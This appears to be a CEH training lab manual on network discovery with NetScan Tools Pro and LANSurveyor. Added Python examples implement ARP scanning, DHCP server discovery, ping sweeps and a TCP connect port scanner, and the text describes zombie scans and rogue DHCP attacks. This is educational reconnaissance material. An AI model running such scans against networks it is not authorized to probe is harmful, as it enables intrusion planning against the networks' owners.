You have already noticed in the previous lab how you can gather information such as ARP ping scan, MAC address, operating system details, IP ID sequence generation, service info, etc. through Intense Scan, Xmas Scan, Null Scan and ACK Flag Scan in Nmap. An attacker can simply scan a target without sending a single packet to the target from their own IP address; instead, they use a zombie host to perform the scan remotely, and if an intrusion detection report is generated, it will display the IP of the zombie host as the attacker. Attackers can easily know how many packets have been sent since the last probe by checking the IP packet fragment identification number (IP ID).

As an expert penetration tester, you should be able to determine whether a TCP port is open by sending a SYN (session establishment) packet to the port. The target machine will respond with a SYN ACK (session request acknowledgement) packet if the port is open and RST (reset) if the port is closed, and you should be prepared to block any such attacks on the network.

In this lab you will learn to scan a network using NetScan Tools Pro. You also need to discover the network and gather information about Internet or local LAN network devices, IP addresses, domains, device ports, and many other network specifics.

Lab Objectives

The objective of this lab is to assist in troubleshooting, diagnosing, monitoring, and discovering devices on a network. In this lab, you need to:
■ Discover IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs
■ Detect local ports
Lab Environment

To perform the lab, you need:
■ NetScan Tools Pro located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\NetScanTools Pro
■ You can also download the latest version of NetScan Tools Pro from the link http://www.netscantools.com/nstpromain.html
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Administrative privileges to run the NetScan Tools Pro tool

Lab Duration

Time: 10 Minutes

Overview of Network Scanning

Network scanning is the process of examining the activity on a network, which can include monitoring data flow as well as monitoring the functioning of network devices. Network scanning serves to promote both the security and performance of a network. Network scanning may also be employed from outside a network in order to identify potential network vulnerabilities.

NetScan Tools Pro performs the following network scanning tasks:
■ Monitoring network device availability
■ Reporting IP addresses, hostnames, domain names, and port scanning

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Tasks

TASK 1: Scanning the Network

Install NetScan Tools Pro on your Windows Server 2012. Follow the wizard-driven installation steps and install NetScan Tools Pro.

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 7.1: Windows Server 2012 - Desktop view

2. Click the NetScan Tools Pro app to open the NetScan Tools Pro window.

Active Discovery and Diagnostic Tools are tools that you can use to locate and test devices connected to your network. Active discovery means that we send packets to the devices in order to obtain responses.
FIGURE 7.2: Windows Server 2012 - Apps
3. If you are using the Demo version of NetScan Tools Pro, click Start the DEMO
4. The Open or Create a New Results Database - NetScanTools Pro window appears; enter a new database name in Database Name (enter new name here)
5. Set a default directory for the results database file location and click Continue

Note: NetScanTools Pro automatically saves results in a database, and the database is required. You can create a new Results Database, open a previous Results Database, or use the software in Training Mode with a temporary Results Database (Training Mode quick start: press Create Training Mode Database, then press Continue). A new Results Database is automatically prefixed with "NstProData-" and ends with ".db3"; no spaces or periods are allowed when entering a new database name. The default Results Database Directory is C:\Users\Administrator\Documents. Project Name and Analyst Information (name, telephone number, mobile number, organization, email address) are optional and can be displayed in reports if desired.
FIGURE 7.3: Setting a new database name for NetScan Tools Pro

6. The NetScan Tools Pro main window appears, as shown in the following figure

Note: The Database Name will be created in the Results Database Directory; it will have NstProData- prefixed and the file extension .db3. USB version: start the software by locating nstpro.exe on your USB drive; it is normally in the /nstpro directory.
FIGURE 7.4: Main window of NetScan Tools Pro (Demo Version, Build 8-17-12, based on version 11.19). The welcome pane explains the tool icons: red icons contact the target directly, green icons listen to network traffic, blue icons work on your local system, and grey icons contact third-party sites. Tools are grouped in the left panel: Automated Tools, Manual Tools (all), Favorite Tools, Active Discovery Tools, Passive Discovery Tools, DNS Tools, Packet Level Tools, External Tools, Program Info.

7. Select Manual Tools (all) in the left panel and click ARP Ping. A window appears with information about the ARP Ping tool
8. Click OK

About the ARP Ping tool (from its information window):
■ Use this tool to "ping" an IPv4 address on your subnet using ARP packets. Use it on your LAN to find the MAC address and response time of a device to an ARP_REQUEST packet, even if the device is hidden and does not respond to a regular Ping.
■ ARP Ping requires a target IPv4 address on your LAN.
■ Don't miss this special feature: identify a duplicate IPv4 address by "pinging" a specific IPv4 address. If more than one device (two or more MAC addresses) responds, you are shown the MAC address of each of the devices.
■ Don't forget to right-click in the results for a menu with more options.
■ Demo limitations: none.
FIGURE 7.5: Selecting the Manual Tools option

9. Select the Send Broadcast ARP, then Unicast ARP radio button, enter the IP address in Target IPv4 Address, and click Send Arp

Note: IP version 6 addresses have a different format from IPv4 addresses and they can be much longer or far shorter. IPv6 addresses always contain 2 or more colon characters and never contain periods. Example: 2001:4860:b006::69 (ipv6.google.com) or ::1 (internal loopback address).

Note: ARP Ping is a useful tool capable of sending ARP packets to a target IP address, and it can also search for multiple devices sharing the same IP address on your LAN. Because ARP is not routed, ARP Ping and ARP Scan only reach hosts in your own broadcast domain; a target behind a router never sees the request, so use the ICMP-based Ping Scanner for those. Two MAC addresses answering for one IP is either a misconfiguration or ARP spoofing, and deserves a closer look either way.
FIGURE 7.6: Result of ARP Ping. For each probe sent to 10.0.0.1 the grid lists Index, IP Address, MAC Address, Response Time (sec) and Type; the first probe is answered via Broadcast and the following ones via Unicast, with response times of about 2-8 ms. The Number to Send and Cycle Time (ms) boxes and the WinPcap Interface selector sit below the grid.

10. Click ARP Scan (MAC Scan) in the left panel. A window appears with information about the ARP Scan tool. Click OK

Note: Send Broadcast ARP, and then Unicast ARP: this mode first sends an ARP packet to the IPv4 address using the broadcast ARP MAC address (ff:ff:ff:ff:ff:ff). Once it receives a response, it sends subsequent packets to the responding MAC address. The source IP address is your interface IP as defined in the Local IP selection box.

About the ARP Scan tool (from its information window):
■ Use this tool to send an ARP Request to every IPv4 address on your LAN. IPv4-connected devices cannot hide from an ARP scan and must respond with their IP and MAC address. (A host can be configured to ignore ARP requests, but then nothing on the segment can reach it over IPv4, so in practice any host you could talk to will answer.)
■ Uncheck the Resolve IPs box for faster scan completion time.
■ Don't forget to right-click in the results for a menu with more options.
■ Demo limitations: none.

Note: ARP Scan (sometimes called a MAC Scan) sends ARP packets to the range of IPv4 addresses specified by the Start and End IP Address entry boxes. The purpose of this tool is to rapidly sweep your subnet for IPv4-connected devices, including hosts whose firewall drops ICMP pings.
FIGURE 7.7: Selecting the ARP Scan (MAC Scan) option

11. Enter the range of IPv4 addresses in the Starting IPv4 Address and Ending IPv4 Address text boxes
12. Click Do Arp Scan
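What the ARP Ping and ARP Scan steps above do on the wire, as an added Python example that is not part of this lab manual or of NetScanTools Pro: it builds the 42-byte Ethernet/ARP request frame (broadcast first, then unicast to a learned MAC, as the tool's "Send Broadcast ARP, then Unicast ARP" mode does), parses the replies, and applies the tool's duplicate-IP check. The MAC addresses and the capture are constructed for illustration (10.0.0.7 is the scanning host, as in the lab); nothing is sent, since raw frames need WinPcap on Windows or root on Linux.

```python
"""ARP Ping / ARP Scan mechanics: build an ARP request frame, parse the replies,
and flag IPv4 addresses claimed by more than one MAC (the tool's duplicate-IP
check). Added example; all frames below are constructed in code, nothing is
sent on the wire."""
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp(opcode, src_mac, src_ip, dst_mac, dst_ip, eth_dst=None):
    """Ethernet II header (14 bytes) + ARP body (28 bytes) = 42 bytes.
    opcode 1 = request ('who has dst_ip?'), 2 = reply ('src_ip is at src_mac').
    eth_dst defaults to dst_mac; the lab's broadcast mode is simply a request
    whose Ethernet destination is ff:ff:ff:ff:ff:ff."""
    eth_dst = eth_dst or dst_mac
    eth = mac_bytes(eth_dst) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)  # Ethernet, IPv4, 6, 4, op
    arp += mac_bytes(src_mac) + ip_bytes(src_ip) + mac_bytes(dst_mac) + ip_bytes(dst_ip)
    return eth + arp


def build_arp_request(src_mac, src_ip, target_ip, eth_dst=BROADCAST_MAC):
    # The target hardware address is unknown, so it is all zeros in a request.
    return build_arp(1, src_mac, src_ip, "00:00:00:00:00:00", target_ip, eth_dst)


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None
    if the frame is not an Ethernet/IPv4 ARP frame."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    hw_type, proto, hw_len, proto_len, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (hw_type, proto, hw_len, proto_len) != (1, 0x0800, 6, 4):
        return None
    return (opcode, mac_str(frame[22:28]), ip_str(frame[28:32]),
            mac_str(frame[32:38]), ip_str(frame[38:42]))


def arp_inventory(frames):
    """Map each IPv4 sender address seen in ARP replies to the set of MACs
    that claimed it. Requests and non-ARP frames are ignored."""
    seen = defaultdict(set)
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed and parsed[0] == 2:
            _, sender_mac, sender_ip, _, _ = parsed
            seen[sender_ip].add(sender_mac)
    return dict(seen)


def duplicate_ips(inventory):
    """IPs answered by two or more MACs: a misconfiguration or ARP spoofing."""
    return {ip: sorted(macs) for ip, macs in inventory.items() if len(macs) > 1}


# Constructed capture: our host 10.0.0.7 probes 10.0.0.1 and 10.0.0.2 (as in the
# lab) and gets three replies, two of them for 10.0.0.1 from different MACs.
ME_MAC, ME_IP = "00:15:5d:01:02:03", "10.0.0.7"
CAPTURE = [
    build_arp_request(ME_MAC, ME_IP, "10.0.0.1"),
    build_arp(2, "a4:2b:8c:00:00:01", "10.0.0.1", ME_MAC, ME_IP),
    build_arp(2, "de:ad:be:ef:00:01", "10.0.0.1", ME_MAC, ME_IP),  # second claimant
    build_arp_request(ME_MAC, ME_IP, "10.0.0.2"),
    build_arp(2, "00:14:22:00:00:02", "10.0.0.2", ME_MAC, ME_IP),
]

if __name__ == "__main__":
    inv = arp_inventory(CAPTURE)
    for ip, macs in sorted(inv.items()):
        print(ip, sorted(macs))
    print("duplicates:", duplicate_ips(inv))
```

Feeding real traffic into `arp_inventory` only requires a capture source (a pcap file or a raw socket) that yields Ethernet frames; the parsing and the duplicate check stay the same.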
Note: The Connection Detection tool listens for incoming connections on TCP or UDP ports. It can also listen for ICMP packets. The sources of the incoming connections are shown in the results list and are logged to a SQLite database.

13. Click DHCP Server Discovery in the left panel. A window appears with information about the DHCP Server Discovery tool. Click OK

Note: DHCP is a method of dynamically assigning IP addresses and other network parameter information to network clients from DHCP servers.

About the DHCP Server Discovery tool (from its information window):
■ Use this tool to quickly locate DHCP servers (IPv4 only) on your local network. It shows the IP addresses and settings being handed out by DHCP. This tool can be used to find unknown or "rogue" DHCP servers.
■ Don't forget to right-click in the results for a menu with more options.
■ Demo limitations: none.
FIGURE 7.9: Selecting the DHCP Server Discovery tool option

14. Select all the Discover Options check boxes (Hostname, Subnet Mask, Domain Name, DNS, Router, NTP Servers), select the interface (here 10.0.0.7) and click Discover DHCP Servers

The tool broadcasts a DHCPDISCOVER and records every DHCPOFFER that comes back. On a healthy segment exactly one server (the one your administrators run) should answer; any additional server is a rogue that can hand clients its own address as default gateway or DNS server and sit in the middle of their traffic, which is the attack the next lab's scenario describes.
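The exchange behind step 14, as an added Python example (not part of the lab manual or of NetScanTools Pro): it builds the DHCPDISCOVER the tool broadcasts, decodes the DHCPOFFER packets that come back (message type, server identifier, offered address, mask, router, lease), and flags any server not on an allow-list. The offers are constructed in code; the first mirrors the lab's result (server 10.0.0.1, mask 255.255.255.0, 3-day lease), the rogue 10.0.0.250 and the transaction IDs are invented for illustration, and nothing is sent on UDP port 67/68.

```python
"""DHCP server discovery: build a DHCPDISCOVER, decode the DHCPOFFER(s) that come
back, and flag offers from servers that are not on the expected list (rogue
DHCP). Added example; the offers below are constructed, nothing touches UDP/67."""
import struct
import ipaddress

MAGIC_COOKIE = b"\x63\x82\x53\x63"
# Option codes from RFC 2132
OPT_SUBNET_MASK, OPT_ROUTER, OPT_DNS, OPT_LEASE = 1, 3, 6, 51
OPT_MSG_TYPE, OPT_SERVER_ID, OPT_PARAM_REQ, OPT_END, OPT_PAD = 53, 54, 55, 255, 0
DISCOVER, OFFER = 1, 2


def _fixed_header(op, xid, chaddr, yiaddr="0.0.0.0"):
    """The 236-byte fixed BOOTP header. flags=0x8000 asks for broadcast replies."""
    return struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                       op, 1, 6, 0, xid, 0, 0x8000,
                       b"\0" * 4, ipaddress.IPv4Address(yiaddr).packed, b"\0" * 4, b"\0" * 4,
                       chaddr.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)


def _option(code, value):
    return bytes([code, len(value)]) + value


def _ip(raw):
    return str(ipaddress.IPv4Address(raw))


def build_discover(xid, client_mac):
    opts = _option(OPT_MSG_TYPE, bytes([DISCOVER]))
    opts += _option(OPT_PARAM_REQ, bytes([OPT_SUBNET_MASK, OPT_ROUTER, OPT_DNS]))
    return _fixed_header(1, xid, client_mac) + MAGIC_COOKIE + opts + bytes([OPT_END])


def build_offer(xid, client_mac, offered_ip, server_ip, mask, router, lease_secs):
    """What a server sends back; used here only to construct sample replies."""
    opts = _option(OPT_MSG_TYPE, bytes([OFFER]))
    opts += _option(OPT_SERVER_ID, ipaddress.IPv4Address(server_ip).packed)
    opts += _option(OPT_SUBNET_MASK, ipaddress.IPv4Address(mask).packed)
    opts += _option(OPT_ROUTER, ipaddress.IPv4Address(router).packed)
    opts += _option(OPT_LEASE, struct.pack("!I", lease_secs))
    return _fixed_header(2, xid, client_mac, offered_ip) + MAGIC_COOKIE + opts + bytes([OPT_END])


def parse_options(data):
    """Walk the TLV option area; PAD (0) has no length byte, END (255) stops."""
    opts, i = {}, 0
    while i < len(data):
        code = data[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        length = data[i + 1]
        opts[code] = data[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def parse_offer(packet, expected_xid):
    """Return a dict describing the offer, or None if it is not an OFFER for our xid."""
    if len(packet) < 240 or packet[236:240] != MAGIC_COOKIE:
        return None
    op, _, _, _, xid = struct.unpack("!BBBBI", packet[:8])
    if op != 2 or xid != expected_xid:
        return None
    opts = parse_options(packet[240:])
    if opts.get(OPT_MSG_TYPE) != bytes([OFFER]):
        return None
    return {
        "server": _ip(opts[OPT_SERVER_ID]),
        "offered_ip": _ip(packet[16:20]),          # yiaddr field
        "mask": _ip(opts[OPT_SUBNET_MASK]),
        "router": _ip(opts[OPT_ROUTER]),
        "lease_secs": struct.unpack("!I", opts[OPT_LEASE])[0],
    }


def find_rogue_servers(offers, authorized):
    """Every server that answered but is not in the authorized set."""
    return sorted({o["server"] for o in offers if o["server"] not in authorized})


XID, MAC = 0x3903F326, bytes.fromhex("00155d010203")   # constructed values
DISCOVER_PKT = build_discover(XID, MAC)
# Constructed replies: the real server 10.0.0.1 (values from the lab's result) and
# a rogue box 10.0.0.250 that offers itself as the default gateway.
REPLIES = [
    build_offer(XID, MAC, "10.0.0.7", "10.0.0.1", "255.255.255.0", "10.0.0.1", 3 * 86400),
    build_offer(XID, MAC, "10.0.0.99", "10.0.0.250", "255.255.255.0", "10.0.0.250", 600),
    build_offer(XID + 1, MAC, "10.0.0.50", "10.0.0.1", "255.255.255.0", "10.0.0.1", 600),  # not ours
]


def discovered_offers(replies=REPLIES, xid=XID):
    return [o for o in (parse_offer(r, xid) for r in replies) if o]


if __name__ == "__main__":
    offers = discovered_offers()
    for offer in offers:
        print(offer)
    print("rogue:", find_rogue_servers(offers, {"10.0.0.1"}))
```

The transaction-ID check matters in practice: on a busy segment you will see offers addressed to other clients, and only replies carrying your `xid` tell you which servers answered you.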
FIGURE 7.8: Result of ARP Scan (MAC Scan). With WinPcap interface 10.0.0.7 selected, a Scan Delay Time set and Resolve IPs checked, the grid lists each responding host's IPv4 Address, MAC Address, I/F Manufacturer, Hostname, Entry Type (dynamic) and whether it is the local address.
Note: NetScanner is a Ping Scan or Sweep tool. It can optionally attempt to use NetBIOS to gather MAC addresses and Remote Machine Name Tables from Windows targets, translate the responding IP addresses to hostnames, query the target for a subnet mask using ICMP, and use ARP packets to resolve IP address/MAC address associations.
FIGURE 7.10: Result of DHCP Server Discovery

15. Click Ping Scanner in the left panel. A window appears with information about the Ping Scanner tool. Click OK

Note: Port Scanner is a tool designed to determine which ports on a target computer are active, i.e. being used by services or daemons.

16. Select the Use Default System DNS radio button, and enter the range of IP addresses in the Start IP and End IP boxes
17. Click Start

About the Ping Scanner (aka NetScanner) tool (from its information window):
■ Use this tool to ping a range or list of IPv4 addresses. It shows you which computers are active within a range (they have to respond to ping). Use it with any list of IP addresses. To see all devices on your subnet, including those blocking ping, use the ARP Scan tool.
■ You can import a text list of IPv4 addresses to ping.
■ Don't miss this special feature: use the Do SMB/NBNS Scan option to get NetBIOS records from unprotected Windows computers.
■ Don't forget to right-click in the results for a menu with more options.
■ Demo limitations: Packet Delay (time between sending each ping) is limited to a lower limit of 50 milliseconds. Packet Delay can be as low as zero (0) ms in the full version. In other words, the full version will be a bit faster.

A host missing from the result is not necessarily down: a host firewall that drops ICMP Echo Requests (Windows Firewall does this by default on public networks) makes the host invisible to a ping sweep while it still answers ARP and TCP. Treat "no Echo Reply" as "no reply", not as "absent".
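The mechanics of steps 16-17, as an added Python example that is not part of the lab manual or of NetScanTools Pro: it builds the ICMP Echo Request a ping sweep sends, computes and verifies the RFC 1071 checksum, expands a Start IP/End IP range, and only counts a host as live when an intact Echo Reply echoes our identifier and sequence number. Sending ICMP needs a raw socket (administrator on Windows, root on Linux), so the send step is a function you plug in; here it is a constructed stand-in for the LAN whose four responders match the lab's result (10.0.0.1, .2, .5, .7) and which also includes an invented host, 10.0.0.9, that replies with a corrupted checksum.

```python
"""Ping sweep mechanics: the ICMP Echo Request the scanner sends, the RFC 1071
checksum both sides compute, and the reply check that turns 'something came
back' into 'this host is up'. Added example; real sending needs a raw socket,
so the send step is pluggable and the responder is constructed in code."""
import struct
import ipaddress

ECHO_REQUEST, ECHO_REPLY = 8, 0


def inet_checksum(data):
    """One's-complement sum of 16-bit words (RFC 1071); 0 for a valid packet."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type, ident, seq, payload):
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    checksum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, checksum, ident, seq) + payload


def build_echo_request(ident, seq, payload=b"netscan"):
    return build_echo(ECHO_REQUEST, ident, seq, payload)


def parse_echo_reply(packet, ident):
    """Return (seq, payload) if packet is an intact Echo Reply to our ident, else None."""
    if len(packet) < 8 or inet_checksum(packet) != 0:
        return None
    icmp_type, code, _, reply_ident, seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_type != ECHO_REPLY or code != 0 or reply_ident != ident:
        return None
    return seq, packet[8:]


def ip_range(start, end):
    """Expand 'Start IP'..'End IP' inclusive, as the scanner's two boxes do."""
    first, last = int(ipaddress.IPv4Address(start)), int(ipaddress.IPv4Address(end))
    return [str(ipaddress.IPv4Address(n)) for n in range(first, last + 1)]


def ping_sweep(targets, send_probe, ident=0x4E53):
    """send_probe(ip, packet) -> reply bytes or None. Returns the live hosts.
    A host is 'live' only if its reply verifies and echoes our ident and seq."""
    live = []
    for seq, ip in enumerate(targets, start=1):
        reply = send_probe(ip, build_echo_request(ident, seq))
        parsed = parse_echo_reply(reply, ident) if reply else None
        if parsed and parsed[0] == seq:
            live.append(ip)
    return live


def make_fake_network(alive, corrupt=()):
    """Constructed stand-in for the LAN: hosts in `alive` answer, hosts in
    `corrupt` answer with a damaged checksum, everything else stays silent
    (a firewall that drops Echo Requests looks exactly like this)."""
    def send_probe(ip, request):
        if ip not in alive:
            return None
        _, _, _, ident, seq = struct.unpack("!BBHHH", request[:8])
        reply = build_echo(ECHO_REPLY, ident, seq, request[8:])
        if ip in corrupt:
            reply = reply[:2] + bytes([reply[2] ^ 0xFF]) + reply[3:]
        return reply
    return send_probe


def demo():
    # The four genuine responders match the lab's result (10.0.0.1, .2, .5, .7);
    # 10.0.0.9 is an invented host whose reply fails the checksum.
    lan = make_fake_network(alive={"10.0.0.1", "10.0.0.2", "10.0.0.5", "10.0.0.7", "10.0.0.9"},
                            corrupt={"10.0.0.9"})
    return ping_sweep(ip_range("10.0.0.1", "10.0.0.50"), lan)


if __name__ == "__main__":
    print("live hosts:", demo())
```

To run it against a real network, replace `send_probe` with a function that writes the packet to a `socket.socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)` and returns the ICMP part of whatever comes back within the timeout; the identifier/sequence check is what keeps stray replies to other tools from being counted.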
FIGURE 7.11: Selecting the Ping Scanner option

DHCP Server Discovery results (FIGURE 7.10): with interface 10.0.0.7 (Hyper-V Virtual Ethernet Adapter #2) selected, the grid lists for each answering server its DHCP Server IP, Server Hostname, Offered IP, Offered Subnet Mask and lease time; the one server found was 10.0.0.1, offering a 255.255.255.0 mask with a 3-day lease.
FIGURE 7.12: Result of the ping scan. With Start IP 10.0.0.1, End IP 10.0.0.50 and Use Default System DNS selected, four hosts answered with an Echo Reply: 10.0.0.1, 10.0.0.2, 10.0.0.5 and 10.0.0.7 (WIN-D39MR5HL9E4, the scanning machine itself), with hostnames resolved where available. Additional Scan Tests offered: Do Local ARP Scan, Do SMB/NBNS Scan, Do Subnet Mask Scan.

Note: Traceroute is a tool that shows the route your network packets are taking between your computer and a target host. You can determine the upstream Internet provider(s) that service a network-connected device.

18. Click Port Scanner in the left panel. A window appears with information about the Port Scanner tool. Click OK

About the Port Scanner tool (from its information window):
NEVER SCAN A COMPUTER YOU DO NOT OWN OR HAVE THE OWNER'S PERMISSION TO SCAN.
■ Use this tool to scan a target for TCP or UDP ports that are listening (open with a service listening).
■ Types of scanning supported: Full Connect TCP scan (see notes below), UDP port unreachable scan, combined TCP full connect and UDP scan, TCP SYN only scan and TCP Other scan.
■ Don't miss this special feature: after a target has been scanned, an analysis window opens in your default web browser.
■ Don't forget to right-click in the results for a menu with more options.
Notes: settings that strongly affect scan speed:
■ Connection Timeout: use 200 ms or less on a fast network connection with nearby computers, and 3000 (3 seconds) or more on a dial-up connection.
■ Wait After Connect: this is how long each port test waits after connecting before deciding that the port is not active. Try 0, then try a larger value, and notice the difference.
■ Demo limitations: none.
FIGURE 7.13: Selecting the Port Scanner option

A full-connect scan completes the TCP three-way handshake on every open port, so the target's service sees (and usually logs) a connection from your address; a SYN scan never sends the final ACK and is quieter, but it needs raw packet access rather than the ordinary socket API. Closed ports answer with a RST; ports that answer nothing until the Connection Timeout expires are filtered by a firewall rather than closed, and a scan that reports every port as inactive may simply have too short a timeout.

19. Enter the IP address in the Target Hostname or IP Address field and select the TCP Ports Only radio button
20. Click Scan Range of Ports

Note: Whois is a client utility that acts as an interface to a remote whois server database. This database may contain domain, IP address or AS Number registries that you can access given the correct query.
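The "TCP Ports Only" full-connect scan of steps 19-20, as an added Python example that is not part of the lab manual or of NetScanTools Pro: each port gets one `connect()` bounded by the Connection Timeout, and the outcome is classified the way the tool does (handshake completed = open, RST = closed, silence = filtered). So that it runs offline without permission from anyone, it scans only 127.0.0.1 against a throw-away listener it starts itself (standing in for the http service the lab found on 10.0.0.1:80) and a port it has just released and therefore knows to be closed; the port numbers are whatever the OS hands out.

```python
"""Full-connect TCP port scan, as in the lab's 'TCP Ports Only' mode: a completed
three-way handshake means open, a RST means closed, silence until the connection
timeout means filtered. Added example; it scans only 127.0.0.1 against a
listener it starts itself, so it runs offline and needs no privileges."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe_port(host, port, timeout):
    """Classify one port. timeout is the tool's 'Connection Timeout' in seconds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return "open"                 # handshake completed: a service is listening
        except ConnectionRefusedError:
            return "closed"               # RST came back: reachable, nothing listening
        except (socket.timeout, OSError):
            return "filtered"             # no answer / unreachable within the timeout


def connect_scan(host, ports, timeout=0.2, workers=32):
    """Scan ports in parallel; returns {port: 'open'|'closed'|'filtered'}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(lambda p: (p, probe_port(host, p, timeout)), ports))


def open_ports(scan_result):
    return sorted(p for p, state in scan_result.items() if state == "open")


def start_listener(host="127.0.0.1"):
    """Bind an ephemeral port and accept-and-close connections in the background,
    standing in for the 'http' service the lab found on 10.0.0.1:80."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((host, 0))
    server.listen(16)

    def serve():
        while True:
            try:
                conn, _ = server.accept()
                conn.close()
            except OSError:           # server socket closed: stop serving
                break

    threading.Thread(target=serve, daemon=True).start()
    return server


def free_port(host="127.0.0.1"):
    """Reserve then release a port so we have one that is certainly closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind((host, 0))
        return sock.getsockname()[1]


def demo():
    """Scan one known-open and one known-closed port on loopback."""
    server = start_listener()
    listening = server.getsockname()[1]
    closed = free_port()
    try:
        result = connect_scan("127.0.0.1", [listening, closed])
    finally:
        server.close()
    return listening, closed, result


if __name__ == "__main__":
    listening, closed, result = demo()
    print(f"port {listening}: {result[listening]}, port {closed}: {result[closed]}")
    print("open ports:", open_ports(result))
```

Against a remote target you would pass `range(1, 1025)` (or the tool's common-ports list) and a timeout chosen as the lab's notes describe: 0.2 s on a LAN, several seconds across a slow link, because every filtered port costs a full timeout. The thread pool is what makes that affordable; thirty-two workers turn 1024 ports at 0.2 s each into a few seconds rather than several minutes.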
FIGURE 7.14: Result of the Port Scanner. Target Hostname or IP Address 10.0.0.1, TCP Ports Only, scanning the port range with Connect Timeout 1000 ms (1 second) and Wait After Connect 1000 ms; the result grid lists Port, Port Description, Protocol, Results and Data Received, and reports port 80 (http, TCP) as Port Active.

Lab Analysis

Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.

Tool/Utility: NetScan Tools Pro
Information Collected/Objectives Achieved:
ARP Scan Results:
■ IPv4 Address
■ MAC Address
■ I/F Manufacturer
■ Hostname
■ Entry Type
■ Local Address
Information for Discovered DHCP Servers:
■ IPv4 Address: 10.0.0.7
■ Interface Description: Hyper-V Virtual Ethernet Adapter #2
■ DHCP Server IP: 10.0.0.1
■ Server Hostname: 10.0.0.1
■ Offered IP: 10.0.0.7
■ Offered Subnet Mask: 255.255.255.0
Talk to your instructor if you have questions related to this lab.

Questions
1. Does NetScan Tools Pro support proxy servers or firewalls?

Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Drawing Network Diagrams Using LANSurveyor

LANsurveyor discovers a network and produces a comprehensive network diagram that integrates OSI Layer 2 and Layer 3 topology data.

Lab Scenario

An attacker can gather information from ARP scans, DHCP servers, etc. using NetScan Tools Pro, as you learned in the previous lab. Using this information an attacker can compromise a DHCP server on the network; they might disrupt network services, preventing DHCP clients from connecting to network resources. By gaining control of a DHCP server, attackers can configure DHCP clients with fraudulent TCP/IP configuration information, including an invalid default gateway or DNS server configuration.

In this lab, you will learn to draw network diagrams using LANSurveyor. To be an expert network administrator and penetration tester you need to discover network topology and produce comprehensive network diagrams for discovered networks.

Lab Objectives

The objective of this lab is to help students discover and diagram network topology and map a discovered network.

In this lab, you need to:
■ Draw a map showing the logical connectivity of your network and navigate around the map
■ Create a report that includes all your managed switches and hubs
Lab Environment

To perform the lab, you need:
■ LANSurveyor, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\LANsurveyor
■ You can also download the latest version of LANSurveyor from http://www.solarwinds.com/
■ If you decide to download the latest version, the screenshots shown in this lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the LANSurveyor tool

Lab Duration
Time: 10 Minutes

Overview of LANSurveyor

SolarWinds LANsurveyor automatically discovers your network and produces a comprehensive network diagram that can be easily exported to Microsoft Office Visio. LANsurveyor automatically detects new devices and changes to network topology. It simplifies inventory management for hardware and software assets and addresses reporting needs for PCI compliance and other regulatory requirements.

Lab Tasks

Install LANSurveyor on your Windows Server 2012. Follow the wizard-driven installation steps and install LANSurveyor.

TASK 1: Draw Network Diagram

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop
FIGURE 8.1: Windows Server 2012 - Desktop view
2. Click the LANSurveyor app to open the LANSurveyor window

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
FIGURE 8.2: Windows Server 2012 - Apps
3. Review the limitations of the evaluation software and then click Continue with Evaluation to continue the evaluation
FIGURE 8.3: LANSurveyor evaluation window
4. The Getting Started with LANsurveyor dialog box is displayed. Click Start Scanning Network

Note: LANsurveyor's Responder client lets you manage remote Windows, Linux, and Mac OS nodes from the LANsurveyor map, including starting and stopping applications and distributing files.

Note: LANsurveyor uses an almost immeasurably small amount of network bandwidth for each type of discovery method (ICMP Ping, NetBIOS, SIP, etc.).
FIGURE 8.4: Getting Started with LANsurveyor wizard. The dialog lists what you can do with LANsurveyor (scan and map Layer 1, 2, 3 network topology; export maps to Microsoft Visio; continuously scan your network automatically) and links to the thwack LANsurveyor forum, the online manual (LANsurveyor Administrator Guide), the Evaluation Guide and Support, with a Start Scanning Network button and a "Don't show again" check box.

5. The Create A Network Map window appears; in order to draw a network diagram, enter the IP addresses in Begin Address and End Address, and click Start Network Discovery

